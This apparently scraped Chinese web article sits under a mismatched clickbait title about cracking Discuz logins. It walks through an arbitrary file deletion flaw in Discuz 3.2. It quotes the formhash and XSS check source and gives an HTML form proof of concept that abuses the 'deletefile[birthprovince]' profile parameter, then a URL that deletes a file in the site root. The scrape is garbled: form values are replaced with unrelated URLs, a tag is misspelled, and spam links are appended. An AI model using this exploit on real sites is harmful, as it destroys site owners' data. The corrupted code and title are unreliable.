discuz破解登录方法分享 discuz漏洞修复工具有哪些
【discuz破解登录方法分享 discuz漏洞修复工具有哪些】验证用的版本:discuz3.2
0x1首先在根目录下新建一个文件
文章插图
0x2 构造poc1修改出生地区
文章插图
注意其中的formhash需要替换掉,具体是在源码中找 。
为什么这里要替换掉formhash呢?
一开始不太清楚,网页会报错,
如下
文章插图
看到了有一个xss验证蛮去找一下这个文件
private function _xss_check() { static $check = array('"', '>', '<', ''', '(', ')', 'CONTENT-TRANSFER-ENCODING'); if(isset($_GET['formhash']) && $_GET['formhash'] !== formhash()) { system_error('request_tainting'); } if($_SERVER['REQUEST_METHOD'] == 'GET' ) { $temp = $_SERVER['REQUEST_URI']; } elseif(empty ($_GET['formhash'])) { $temp = $_SERVER['REQUEST_URI'].file_get_contents('php://input'); } else { $temp = ''; } if(!empty($temp)) { $temp = strtoupper(urldecode(urldecode($temp))); foreach ($check as $str) { if(strpos($temp, $str) !== false) { system_error('request_tainting'); } } } return true; }12345678910111213141516171819202122232425262728发现了如下代码
if(isset($_GET[‘formhash’]) && $_GET[‘formhash’] !== formhash())
{
system_error(‘request_tainting’);
}
这里就是对formhash做判断的地方了,当然判断地方不止一个 。这里formhash应该是每次登陆后随机生成的,具体源码没有去找他,但尝试两次登陆后找到的formhash不一样
0x3 构造poc2删除zsdlove.txt文件
test->poc<form action="http://localhost/discuz3.2/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=zsdlove" method="POST" enctype="multipart/form-data"><input type="file" name="birthprovince" id="file" /> <br><br><input type="text" name="formhash" value="https://www.cnfyg.com/shcs/3e42ef6f"/><br><br><input type="text" name="profilesubmit" value="https://www.cnfyg.com/shcs/1"/><br><br><input type="submit" value="https://www.cnfyg.com/shcs/Submit" /></from>123456789将该poc保存为html文件打开
文章插图
随便上传一张图片,注意其中的formhash也要替换
在浏览器中访问
文章插图
localhost/discuz3.2/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=zsdlove1在看看网站根目录
文章插图
文件已经被删除了
0x4 修复方案:官方已经发布补丁,请尽快修复
推荐阅读
- 手机和平板如何同时登录微信 你会吗
- 为什么辽事通登录不上
- oppo手机锁屏密码破解 oppo手机怎样解锁手机锁屏密码
- 工商银行登录不了怎么办
- 破解版是什么意思
- 吃鸡王者荣耀苹果安卓怎么扫码登录,马上学会,帮小姐姐上分更简单啦
- 支持多账号切换登录微信安卓版8.0.10正式版更新
- 王者荣耀怎么扫码 王者荣耀扫码登录教程
- 和平精英登录白屏怎么办 和平精英登录白屏的解决办法
- kok体育怎么进行登录